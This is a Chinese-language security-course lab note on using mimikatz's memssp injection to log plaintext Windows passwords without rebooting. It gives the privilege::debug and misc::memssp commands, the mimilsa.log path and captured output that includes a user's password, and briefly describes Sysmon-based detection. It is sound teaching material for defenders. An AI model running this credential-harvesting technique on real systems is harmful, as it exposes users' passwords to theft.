NTUSTISC - AD Note - Lab(無法Reboot的時盜取Passwd)
[TOC]
Lecture Video: 2022/05/04 AD 安全1
Background
如果遇到不能重開機的狀況,要怎麼前面提到的明文密碼呢?可以利用MEMSSP,它也是mimikatz設計的一個小後門,只要提升debug權限,再注入這個後門,之後等其他人登入到此主機,就可以被這個後門記錄起來
Lab
==無法Reboot的時盜取Passwd==
- Inject memssp
記得用系統管理員權限開mimikatz
1
2
3
4
5mimikatz # privilege::debug Privilege '20' OK mimikatz # misc::memssp Injected =)
- Relogin 重新登出再登入才會看到
- Result
在
C:\Windows\System32\mimilsa.log
1
2
3
4
5
6
7
8
9
10
11
12[00000000:001f7c0f] kuma\DESKTOP-G95U93T$ maj"2g<h(&iQZ7kqFHQ4X&c;_wQq3V;*gq.(A=4&)eesNp8S=W)C,"nM:ns?6m.%;K4+CSGDFew>VaNQ;N_)?mB1\P9udE7Gs'Lsr ccxo*CyL=JdK"'kF [00000000:001f7c0f] kuma\DESKTOP-G95U93T$ maj"2g<h(&iQZ7kqFHQ4X&c;_wQq3V;*gq.(A=4&)eesNp8S=W)C,"nM:ns?6m.%;K4+CSGDFew>VaNQ;N_)?mB1\P9udE7Gs'Lsr ccxo*CyL=JdK"'kF [00000000:001f80d1] kuma\DESKTOP-G95U93T$ maj"2g<h(&iQZ7kqFHQ4X&c;_wQq3V;*gq.(A=4&)eesNp8S=W)C,"nM:ns?6m.%;K4+CSGDFew>VaNQ;N_)?mB1\P9udE7Gs'Lsr ccxo*CyL=JdK"'kF [00000000:001f80d1] kuma\DESKTOP-G95U93T$ maj"2g<h(&iQZ7kqFHQ4X&c;_wQq3V;*gq.(A=4&)eesNp8S=W)C,"nM:ns?6m.%;K4+CSGDFew>VaNQ;N_)?mB1\P9udE7Gs'Lsr ccxo*CyL=JdK"'kF [00000000:001f80e8] kuma\DESKTOP-G95U93T$ maj"2g<h(&iQZ7kqFHQ4X&c;_wQq3V;*gq.(A=4&)eesNp8S=W)C,"nM:ns?6m.%;K4+CSGDFew>VaNQ;N_)?mB1\P9udE7Gs'Lsr ccxo*CyL=JdK"'kF [00000000:001f80e8] kuma\DESKTOP-G95U93T$ maj"2g<h(&iQZ7kqFHQ4X&c;_wQq3V;*gq.(A=4&)eesNp8S=W)C,"nM:ns?6m.%;K4+CSGDFew>VaNQ;N_)?mB1\P9udE7Gs'Lsr ccxo*CyL=JdK"'kF [00000000:001fc7f9] kuma\bear 1qaz@WSX3edc [00000000:001fc7f9] kuma\bear 1qaz@WSX3edc [00000000:001fc85a] kuma\bear 1qaz@WSX3edc [00000000:001fc85a] kuma\bear 1qaz@WSX3edc [00000000:001fc7f9] kuma\bear 1qaz@WSX3edc [00000000:001fc7f9] kuma\bear 1qaz@WSX3edc
可以看到這個log file用明文的方式新增了我們剛剛打入的密碼
==How to detect it?==
一樣是用Sysmon的Event ID: 11可以知道,但因為之前安裝不成功所以只能Skip,不過原理就是他是去偵測lsass.exe建立mimilsa.log的瞬間